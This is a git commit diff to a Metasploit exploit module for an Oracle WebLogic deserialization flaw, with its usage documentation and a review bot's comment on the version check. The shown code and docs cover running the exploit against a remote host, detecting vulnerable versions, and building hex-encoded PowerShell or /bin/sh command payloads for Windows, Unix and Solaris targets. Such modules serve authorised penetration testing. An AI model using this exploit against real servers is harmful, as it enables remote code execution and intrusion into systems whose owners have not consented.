Some improvements in code and documentation.

master
Andres Rodriguez 2018-12-15 20:42:17 -08:00
parent 29c70b8585
commit 873d048b89
2 changed files with 20 additions and 19 deletions


@ -7,7 +7,7 @@
2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject` 2. `use exploit/multi/misc/weblogic_deserialize_marshalledobject`
3. `set rhosts <rhost>` 3. `set rhosts <rhost>`
4. `set rport <srvport>` 4. `set rport <srvport>`
6. `exploit` 5. `exploit`
## Scenarios ## Scenarios
### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80 ### Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80
``` ```


@ -84,26 +84,27 @@ class MetasploitModule < Msf::Exploit::Remote
disconnect disconnect
return CheckCode::Unknown unless res return CheckCode::Unknown unless res
/WebLogic Server Version: (?<version>\d+\.\d+\.\d*\.*\d*)/ =~ res unless res.include?('Oracle WebLogic Server Administration Console')
if version return CheckCode::Safe
version = Gem::Version.new(version)
print_status("Detected Oracle WebLogic Server Version: #{version.to_s}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
end end
if res.include?('Oracle WebLogic Server Administration Console') /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.*\d*)/ =~ res
return CheckCode::Detected unless version
return CheckCode::Safe
end end
CheckCode::Unknown version = Gem::Version.new(version)
vprint_good("Detected Oracle WebLogic Server Version: #{version}")
case
when version.to_s.start_with?('10.3')
return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
when version.to_s.start_with?('12.1.3')
return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
when version.to_s.start_with?('12.2')
return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
end
return CheckCode::Safe
end end
def t3_handshake def t3_handshake
@ -179,11 +180,11 @@ class MetasploitModule < Msf::Exploit::Remote
if target.name == 'Windows' if target.name == 'Windows'
pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
elseif target.name == 'Unix' elsif target.name == 'Unix'
nix_cmd = payload.encoded nix_cmd = payload.encoded
nix_cmd.prepend('/bin/sh -c ') nix_cmd.prepend('/bin/sh -c ')
mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join mycmd = nix_cmd.each_byte.map {|b| b.to_s(16)}.join
elseif target.name == 'Solaris' elsif target.name == 'Solaris'
sol_cmd = payload.encoded sol_cmd = payload.encoded
mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join mycmd = sol_cmd.each_byte.map {|b| b.to_s(16)}.join
end end
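Review bot: In the `check` hunk the version pattern still ends in `\.*\d*`, so a banner whose version is followed by a stray dot (for example `12.2.1.`) is captured as-is and handed to `Gem::Version.new`, which raises `ArgumentError` on a malformed string. The banner comes from the remote host, so the capture should be tightened to `(?<version>\d+\.\d+\.\d+(?:\.\d+)?)`. The new trailing `return CheckCode::Safe` also reports Safe for any version that matches none of the three `when` prefixes, which gives a false all-clear for releases the table does not cover; `CheckCode::Detected` looks like the more honest result there. The body of `check` starts above this hunk, so how `res` is obtained is not visible here.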